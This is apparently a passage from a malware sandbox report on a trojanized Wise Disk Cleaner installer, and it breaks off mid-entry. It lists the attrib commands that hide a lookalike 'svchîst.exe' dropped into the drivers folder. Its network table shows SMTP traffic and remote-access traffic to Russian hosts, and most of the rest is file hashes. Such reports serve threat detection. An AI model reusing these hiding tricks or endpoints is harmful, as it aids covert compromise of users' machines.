C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "svchîst.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s "install.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s "install.cmd"
C:\Windows\SysWOW64\drivers\svchîst.exe
C:\Windows\SysWOW64\drivers\svchîst.exe -firewall
Network
| Country | Destination | Domain | Proto |
| NL | 20.50.201.200:443 | tcp | |
| NL | 67.26.111.254:80 | tcp | |
| NL | 67.26.111.254:80 | tcp | |
| NL | 67.26.111.254:80 | tcp | |
| US | 13.107.21.200:443 | tcp | |
| US | 8.8.8.8:53 | www.wisecleaner.net | udp |
| US | 23.224.25.141:80 | www.wisecleaner.net | tcp |
| US | 8.8.8.8:53 | www.wisecleaner.net | udp |
| US | 8.8.8.8:53 | info.wisecleaner.com | udp |
| US | 104.26.2.143:80 | info.wisecleaner.com | tcp |
| US | 104.26.2.143:80 | info.wisecleaner.com | tcp |
| US | 23.224.25.141:80 | www.wisecleaner.net | tcp |
| US | 8.8.8.8:53 | smtp.spaceweb.ru | udp |
| RU | 77.222.41.136:25 | smtp.spaceweb.ru | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| RU | 109.234.156.179:5655 | tcp |
Files
memory/1800-130-0x0000000000000000-mapping.dmp
memory/528-131-0x0000000000000000-mapping.dmp
memory/5008-132-0x0000000000000000-mapping.dmp
memory/544-133-0x0000000000000000-mapping.dmp
memory/1196-134-0x0000000000000000-mapping.dmp
memory/876-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
| MD5 | a22b08040d741fb41fc5812996ad3e8f |
| SHA1 | cc684e1c8d24aabeb0eab2763655d3050389c953 |
| SHA256 | d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c |
| SHA512 | a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e |
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
| MD5 | a22b08040d741fb41fc5812996ad3e8f |
| SHA1 | cc684e1c8d24aabeb0eab2763655d3050389c953 |
| SHA256 | d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c |
| SHA512 | a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e |
memory/4876-138-0x0000000000000000-mapping.dmp
memory/876-139-0x0000000000400000-0x0000000000438000-memory.dmp
memory/4576-140-0x0000000000000000-mapping.dmp
memory/4592-142-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp
| MD5 | 2542d7026b9bbf47242cc3bae8e889e7 |
| SHA1 | 4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d |
| SHA256 | 71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf |
| SHA512 | be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb |
memory/4632-143-0x0000000000000000-mapping.dmp
memory/876-145-0x0000000000400000-0x0000000000438000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp
| MD5 | 2542d7026b9bbf47242cc3bae8e889e7 |
| SHA1 | 4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d |
| SHA256 | 71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf |
| SHA512 | be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb |
memory/4252-147-0x0000000000000000-mapping.dmp
memory/1372-148-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\install.exe
| MD5 | 1cd9ee0406b9a04672fdd385ca7631ce |
| SHA1 | 5b3b49cd7906676ad46a7b7d192967df6c9ea505 |
| SHA256 | 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8 |
| SHA512 | 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7 |
C:\Windows\SysWOW64\drivers\install.exe
| MD5 | 1cd9ee0406b9a04672fdd385ca7631ce |
| SHA1 | 5b3b49cd7906676ad46a7b7d192967df6c9ea505 |
| SHA256 | 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8 |
| SHA512 | 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7 |
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp
| MD5 | 8708699d2c73bed30a0a08d80f96d6d7 |
| SHA1 | 684cb9d317146553e8c5269c8afb1539565f4f78 |
| SHA256 | a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f |
| SHA512 | 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264 |
memory/1492-152-0x0000000000000000-mapping.dmp
memory/1712-153-0x0000000000000000-mapping.dmp
memory/2988-154-0x0000000000000000-mapping.dmp
memory/116-155-0x0000000000000000-mapping.dmp
memory/4516-156-0x0000000000000000-mapping.dmp
memory/2508-157-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe
| MD5 | e6495a498dfa91672a383cb9459c9c5e |
| SHA1 | d1d44a9ec6df8fc42008c13bcf18ca5f790a371e |
| SHA256 | ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778 |
| SHA512 | 7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a |
C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe
| MD5 | e6495a498dfa91672a383cb9459c9c5e |
| SHA1 | d1d44a9ec6df8fc42008c13bcf18ca5f790a371e |
| SHA256 | ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778 |
| SHA512 | 7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a |
memory/4636-160-0x0000000000000000-mapping.dmp
memory/4740-161-0x0000000000000000-mapping.dmp
memory/2040-162-0x0000000000000000-mapping.dmp
memory/4464-163-0x0000000000000000-mapping.dmp
memory/1120-164-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
memory/2172-166-0x0000000000000000-mapping.dmp
memory/2752-167-0x0000000000000000-mapping.dmp
memory/2408-168-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe
| MD5 | e2921d7229412e500624c09645a5d222 |
| SHA1 | b1ce462f1a21b726f515150c5aede4b8c592c906 |
| SHA256 | ddbe20fca82bad3524f1940fbb5719560a19e61848f802232c4a3f282244b96c |
| SHA512 | 09bbf7bd9ae1ca3ae9389ac2a031bb14ef97aa9ae151ad4f3c689bc78fcc6cf511c52bddb870271365745c47c5199191d6803cade998af2c67269c54bea978a8 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll
| MD5 | b936056bd95fa2de3197f0267c07f529 |
| SHA1 | 2cb2a37e5df9a9039995e0248058f0df361d7a90 |
| SHA256 | 1ec6c0f9ac71693fc04e59855f4231d4348761b4a2eb1171916dee56b604ce89 |
| SHA512 | 156ead7c66ae263457e4605f7970506f43af79e1ad15fbd0d76f6435f0bd9ec20591bb779132315a4ad422fb3484982ace37e8a4c73d1987a7a5030a4e3745a3 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll
| MD5 | b936056bd95fa2de3197f0267c07f529 |
| SHA1 | 2cb2a37e5df9a9039995e0248058f0df361d7a90 |
| SHA256 | 1ec6c0f9ac71693fc04e59855f4231d4348761b4a2eb1171916dee56b604ce89 |
| SHA512 | 156ead7c66ae263457e4605f7970506f43af79e1ad15fbd0d76f6435f0bd9ec20591bb779132315a4ad422fb3484982ace37e8a4c73d1987a7a5030a4e3745a3 |
memory/2512-170-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll
| MD5 | dfa08af47fb6bbff6b92308bdce07fe8 |
| SHA1 | 63078cb67be4bf2dda6cf0de7cfa204ba91441ca |
| SHA256 | 7c02eb0f0d7ffe0738649a3aff2c70d3196c9afba81efd56a3b85ca65ee8ffce |
| SHA512 | 07848b8cf0eeae17fc67cfb58b2ea009c1726d11256a1c23433dc05a73e703329bfb5d6cc686c8f1f3e2cefc14bc6a946a336d042f982ace23bd398ec1320967 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll
| MD5 | dfa08af47fb6bbff6b92308bdce07fe8 |
| SHA1 | 63078cb67be4bf2dda6cf0de7cfa204ba91441ca |
| SHA256 | 7c02eb0f0d7ffe0738649a3aff2c70d3196c9afba81efd56a3b85ca65ee8ffce |
| SHA512 | 07848b8cf0eeae17fc67cfb58b2ea009c1726d11256a1c23433dc05a73e703329bfb5d6cc686c8f1f3e2cefc14bc6a946a336d042f982ace23bd398ec1320967 |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
memory/3564-179-0x0000000000000000-mapping.dmp
memory/3504-180-0x0000000000000000-mapping.dmp
memory/4416-181-0x0000000000000000-mapping.dmp
memory/3052-182-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
memory/3720-186-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\French.ini
| MD5 | 3ec80eda36af3cae27ad0bc179efe392 |
| SHA1 | 42924e65a3b9bef333b9f546343cf30d6fe25d71 |
| SHA256 | 0c05485c08fc6877eae77afa6d38623360c16aadf9b6ad0271079854b6d8b83e |
| SHA512 | 6f5a1c499adb8d8fd20b29293a8b91e942de6945df1df0185d7e2e71ed48ea917f38b785f206f0d6065b6ae4a5b85f38e8275315e86679d4def32f35d1351cb4 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\German.ini
| MD5 | 12aa09156da6482c24a1b2d4b55d855c |
| SHA1 | 1c2dad1b7d7beeb65710da2efafe36688754000e |
| SHA256 | 2fd313688b2ad99a3a4be590b5b96f4932cdecf5211771b84f2d060b00a3893e |
| SHA512 | 0742e6ab784dc765dcd13f0551883bad341b254cb993a8a6016ffbd18846109bbb6f00611dfde797db8382e014805c6e2a8ac38c50c827054af9ac7447e511dd |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Welsh.ini
| MD5 | f1aa230d4e1dc0ad8ce48dbbf0f93353 |
| SHA1 | 45c5ef63cf2110a2a11461185d30b9c5a081fc22 |
| SHA256 | 265348499e6625affb99259e7d1770f0155a5e3b7bf62f4b61f3aa01832d8f9c |
| SHA512 | 263251223abca66cdeec425651c706d49e7bcc48769344104ef9cd5122ff9bdc125153b25207fc0af744b20d61086894cc8b10ee3defba9493e5da2709717202 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Ukrainian.ini
| MD5 | a3384eb4a6122fb763038c26359acf05 |
| SHA1 | a0d587ccf4f19022e6e4b4df3106e87a1ded94c7 |
| SHA256 | 3d20e0e5cfd6375253d4286ec5fd33fdf7aeb0d8bf26cb714d8b91e3b3c10868 |
| SHA512 | 6b2d99fb897f6e7fa017b312127f29d37bfd046b343c1a6849a4e7cb408e9f7709d3b5d2000fab430f6189e70cd6afffef324b1187f8b25fe2e9ce3ca2b04a27 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Turkish.ini
| MD5 | f34b68131e35f62513feb8278cca1ae1 |
| SHA1 | bd4ac075b01cd358431e2d9ad6fb2fe2de8b5aff |
| SHA256 | 49b0ecac0b88c345cd6b5f3f501f25e3720077faf6710c5f2b6fd984e4d4d7f9 |
| SHA512 | c6cdbeb4771f3cc2de6116c0fde80348d34ade78506d54c61eca596d3131bd809452155fc4868b18f15b3968ee0ae4f01e7cbefecafd58d499e263543bdc1dbf |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Thai.ini
| MD5 | 85f062f1a900a1da8a32f46803cb62fb |
| SHA1 | 5baa775d7d287060937f8b86c69be1850a1f9ab4 |
| SHA256 | 3e8e09cf740bef1dabdcb6a7c69185bf0fac3f13b727c2c1de79fbde7308470a |
| SHA512 | 7b40bff744244e48edafdb999aed616519b7665187a25d522c88532a0e5e8eacc9091fbb198c93fbe39a860e10c35ee39a689e8f31dab2cca578cf12057fef50 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Swedish.ini
| MD5 | 8f053575db50cfaf4418fb2e5263b2ae |
| SHA1 | cb95844f69291b2656726f156e51b8611a55d4fb |
| SHA256 | 98677a07f37daa333e507fc576aba8ebb4489a5822104f7c4bee53db2f8e4202 |
| SHA512 | e7e3fcddd6f1b21aa48901f0e8d9633705b69d8f34ce08c2e7fd81128c7dd811bf2755e4f517325a10480a427a7eebe19307deb96edff9ecc8077094ea740061 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Spanish (Spain).ini
| MD5 | fef1352852ad6da36123893c3c183834 |
| SHA1 | 5599ea541a373e9e63b692db17126eb42f1739bf |
| SHA256 | d295342e3fff2bb44fe3010669400ddbc82e103f87beb5ead1c6b3cab3ade0b6 |
| SHA512 | 7dda1508cd623dc753ef137ac58e759bab22f422f20d3802c49876bdd003015468ef5674c4186ae04fb745ae56d9ae21d57438baffad9597f0be53ee2e9f8d3a |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Spanish (Colombia).ini
| MD5 | ae51cebbeb929ca8ef00abdee0554352 |
| SHA1 | e245b0ece229b9d1a2109fb48e1533f0f7dcc490 |
| SHA256 | 9cb9b5580e4706168c02b07f3ef6656ebd2f6d9661cccd75b089a465d5ac0565 |
| SHA512 | c617871237592bfe3bcd1ac4e3b41ef4157b0b6cbcb636fe0d56f8ea59c198fc4551b6b86f1497778f3c4db06fb8e89169e5ac0e9662532d4c6f0f0b944a3ea1 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovenian.ini
| MD5 | 204fe6fcde25232628a4d7b34e6b87fd |
| SHA1 | 613efc64843467bd90ec64949367f2139f4b581e |
| SHA256 | 4940b086c467d2ee6fd232f787bf03382c8328f2ce71c7ca747c02a7a368c1de |
| SHA512 | 88af2f2bff0fb8daa60c048cef6008bafdb636970b30da4765cf6ee2f62604e1581a3ce822555a14d018a7f10d0d2da2e072d58b12be4f27200dcdf20890b726 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovak.ini
| MD5 | 5108c5d28c126216a792f4a0900847fa |
| SHA1 | 9a8b3e565e37e1bf717d3e1c7ebca12e414328f5 |
| SHA256 | 3860ad448ebd501be377fbd46c65cb4e7aecc809900d5f085ee5223931425695 |
| SHA512 | ce241b74f7903131fd0af070cc75a29d01e375e5d05636814fa123c1edfdb0304863f997fb3fcb3467bf87b770f8412acf67a29480b96877e8d4fd0888b39438 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Serbian.ini
| MD5 | d5de1a134aab351dcd5b8f22f32ec30a |
| SHA1 | 45404143905dcb284e99acd78285a3ba86a1c1a6 |
| SHA256 | 2a2338c828fd426a6d50e4866ed1c59ccd292b877cf66374c57a8826b30c9aa1 |
| SHA512 | 7727f4c9902daae600e48a950afd61ba2e26d8a943f20bbfc2ec7eaf01f1de2a8b9d04e4fd4ec9b38cf700c6df00d58c714f1208e60383755ad5220715912427 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Russian.ini
| MD5 | 479bfcd4c6e0a91bce8eeb3d5282902a |
| SHA1 | a73b34daca2a27e159a7f14148423bd0e8877287 |
| SHA256 | b326491b5a4245e9b3a436cfe1b023d88b35cdbbb50368bbac5f7d1f19560718 |
| SHA512 | 8c799a763cae7bdd33ff8d9a3295b2b92f87413bdb46e590c02255aedbd32707faf5d5badfc884cddeeb8be4772c2f824d16af3996e5ecb0692a2399594121f0 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Romanian.ini
| MD5 | e56f223aea3e1d394c31b93f17054cb7 |
| SHA1 | 9fe9ca1dc70cd7e0b2264842139a364ac4a8e689 |
| SHA256 | 865b6284291dba5b148d236f0ebfd3aebf0998dabfe36cc3a013658af1733dcc |
| SHA512 | 21050172c652bbcc93ab409d16aaef330a713d8dcf33b5f84ea323832b3489bddcb98ec552d00e48afd894e1f935a0fdc22749ee018f8d46d407559a0137eeed |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Portugal).ini
| MD5 | 66ccf14a92b6354bed01867615a76d90 |
| SHA1 | 7f133285713146b2e343d44c0de190fac75e40f6 |
| SHA256 | a3af006e4957a14abd637e50cf265ecba049ca53ff716ec0298c96a0265a2f9e |
| SHA512 | c43f521781d59a150a124d6105d295dbfb5ac6dee0401b9c927eeda8ba0a8df21d1e69fdf8dc090314f3945b97dc72a9cd3ba9aed34bbb8f9ae96fdcb96ca784 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Brasil).ini
| MD5 | 3445d1277329541b11ddb2b1b5dc54f5 |
| SHA1 | 57fac60be3e79eb01d4170df6abbb44dc62c21e6 |
| SHA256 | c34cf5c5773429d9c1273bdeebaf59fc0f7984db541f6524d2c1718c191aeed2 |
| SHA512 | 2b0080337609bd458677532371a9226b9112edc9a1c8a6567423fd324559338c934ae409a012a903ca6f464281c327a812aefe932395d9e739ef8f0e379ebf28 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Polish.ini
| MD5 | 1a59560e88582dac1e5b7a70a38463a5 |
| SHA1 | fe80e956dbf54bd066f2f11d697072377dd3df6b |
| SHA256 | b826a3a9198323ce5b29ba96a311a632b98c05fbf4d02213abd30ce0ea262427 |
| SHA512 | 0d00273db68c3ebb58f0be6102b1f23d2096197aacaa8577aa42473aa1b587f50c86f333c1831b78879b2ba5ab1793488af1f875ed111eb800a1b2c9becdf69e |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Persian.ini
| MD5 | 71f1fe9e66926028a09b7a5ff36ec42a |
| SHA1 | 521a99b288ae887391c36fb86555e25df5685164 |
| SHA256 | 8044110a96bbe6dcc5cc74fa8106a2ed250536ea8785b0eb1148a696c74c5353 |
| SHA512 | 62c8b5c0eda2163d7093da06a176270558f377d0e7fc8fd2aea137045c5fdc4cf62be47fc2c215e2bf4d68ba8eb343ceb70bce1b991502ecd1407350dab086c5 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Nynorsk).ini
| MD5 | d82a2f11ab17c1fdc94e8aca732bfdc6 |
| SHA1 | 58347d500fa9efaf46b600345f9752f426e99b45 |
| SHA256 | 6e9385096f433f4a4d95997d0483ab08695b6b7cf2c9f1f525cf41b83c85459c |
| SHA512 | 61f6ddad161a8e0df43b60e424fbd83e0d759f1bedfcfd5268c803f98d98ba4006b1c2f9f2b63b3a3461401fdbf16dec2cd07d8fac15af7eb61fd5b79a564343 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Bokmal).ini
| MD5 | 5d95e5077b31764d3d91ace0ea64490f |
| SHA1 | 12bcc6fd0e6fa8c7109cc4cf19033a0c3cd8fadd |
| SHA256 | 73721487c7680b844e73079cc57acc6988622506230f73929c63ef197d19c83e |
| SHA512 | f22e764a002e835a51fc4db17320c96241e949f6b437c1f699714e41ca759f096a99c61cc82b773198f962170322cadbd4a5f943550ad7b4355d48cf05915bcc |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Nepali.ini
| MD5 | 8e9d6867bb1b047e0e7eecf8a7ab4151 |
| SHA1 | 269c9258fed0552758c75897ed8346e7e8c4eb2b |
| SHA256 | 44c210cf753a79acba19b171fe4643056dee29d441ccf91fa6121b7e441cd2ea |
| SHA512 | 817e7016dd68f6402029c1f8fa49ac2edd8d114f06ac5a8c1b68b39e77279d6e68ec49a575da950e1c9d686488195bebb95d0997bf3123bfe54dfffcea689183 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Korean.ini
| MD5 | 8f674280944a449f943689e19ad0ced2 |
| SHA1 | 90c7d3972bb418eecb2696e2e7390df2c0a33a7d |
| SHA256 | a2223c96dc9fced161469aa2989db97ba0e9393dc86cbdc7aa06d4342772a000 |
| SHA512 | 6b788b826af729a2217d6b5d72bdaf4ab9682e6cd71331d1c5da4384fc25a4b4d9f2b44d776b65a8ade2d589ce55baa7e00f11a9d53a36fa79ce5943f843df65 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Japanese.ini
| MD5 | 7792786223200e5da40d9c542a7f4b8b |
| SHA1 | b71f45389d66dfb56303a81547aafcd3bfbe869a |
| SHA256 | a62a2aaf6e39e46a9cb0053a670d09dcb4aaf9142f89a7b12daad1793154db9a |
| SHA512 | 2a3d66677eeeea065392d27546bc2fba5e115f906cd1dc4398dd848f104a9d5cf98d2dfec8daa432ad94ee6f93bd45d5f300c0c6801bbfadb073639b3f5f32e7 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Italian.ini
| MD5 | 4b9f92249266356fea5844eccdc6e6f1 |
| SHA1 | 0a060c8d39e98fbda3411b8b915a83754af54089 |
| SHA256 | 1a2f241b503be86067d89a8fcb69bdffcccec96912a765337dfadcce6bca75b0 |
| SHA512 | 8ab4323d596a71d1cbc9492b48eb6f6996ddd0411edd6732417b68dd27d1acb2f00c17865ce7a17dac58947dd7482771c11c8fc5c2b73561a47469641fe9a82a |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Indonesian.ini
| MD5 | 0a763d65adccbe593039ccdcfde7b499 |
| SHA1 | 833c56164a17b152d4098ee95fd4bb6912193a89 |
| SHA256 | 759b0029fc140d49cb40bcd197fc64537fe408cd78641d0cecafac599aa97d10 |
| SHA512 | b83d88ce225621e0460d40c8c9ad92e91ffe1c0b3875270ff8ed8aa66a7b3a08c6605e6f4e7b7bf5d02b9ea2ab7256dff07f2bf31232d2675de869d06bfc9d7e |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hungarian.ini
| MD5 | b967b7a48eca3f5076033759089e4142 |
| SHA1 | 9e29f54c07066608be1cb6abc59cf7cda823cc03 |
| SHA256 | 1ecce57dbf90759fcfefbea163521dfb8d3281a98c216d94ec51771308cf32dd |
| SHA512 | 4a588f3150e21d1b7923fc885ab28f36a40488157f583de9558476d04a2ceb5fa3d0f91ba09d12aacee1a0a8d5797c4be6e15ba01e6a01427e1de88845bd04cb |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hebrew.ini
| MD5 | 75009c9455e68643ac2e2301b8af20e2 |
| SHA1 | 3091a33bb6517115b38f4eb3cad3747f3b64569c |
| SHA256 | 05746a60b31c255eaf1ea903c5ad47f3e25d98633472cee165acbec3521c64a8 |
| SHA512 | 18619921ab3bcf481466960f1cab10b2185be93470ee9b6cd01377b523ea8810e6d159a4515a0cfa575df3617f47fc5cee7d5982cc2deff0fa8a69644e7a0eb8 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Greek.ini
| MD5 | 6e449bd01c21478ec0c19bd25a8c3ee5 |
| SHA1 | 2aeba60b7600ca9e71a5fdd04c06ba05f1010262 |
| SHA256 | 5c891ead72b187252daf3de22075a9c0e7f967e3050aec97db6f019d59bec138 |
| SHA512 | b691de0ac4254a29a6dd87fdfa5973c4b8c11719304ed665d6db661df66d7a1693e15514477979e24eabcd48fe9287fe07a123da6a469ef5dad07cf43d531021 |
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Finnish.ini
| MD5 | dc73d7da4015500c369caacb8ef26e21 |
| SHA1 | c33246680111d1fc3fb3cdac10dd7c37f9f05a33 |
| SHA256 | d70edac364dd4273a80e40e5d3a710198576b1cfd81e3cec0bfb4d4683dd50fb |
| SHA512 | 0f4f0a50f3dd36999864669f078d686b5af04cfb750951c9abe2cdbb609c683e447fd56ac28a34d4a83e53444c12d13cc742bcc9bd3236ba6e363dfbcecbf3f8 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\English.ini
| MD5 | dfb897952f03b002a95ef8f47a98afe5 |
| SHA1 | cd9801955ea04a949175cbb8a3972488ef15e966 |
| SHA256 | 86da3520698f44289c789b1d4771929edc36f5dd36c6ba54e1382a06a39c7684 |
| SHA512 | 8536477f154d0687e0c6673b553a27c1f2ef2b38231162e31ab4039db0d772d5d652518f15ddddbf74f981345307eef175321ae262514b06506b18823e0dc5ba |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Dutch (Nederlands).ini
| MD5 | 8e2dedf7ad4959dcba5aad9221755ac1 |
| SHA1 | 1e47e115dc2fb5cc2e27d1ab2726b85409c8338b |
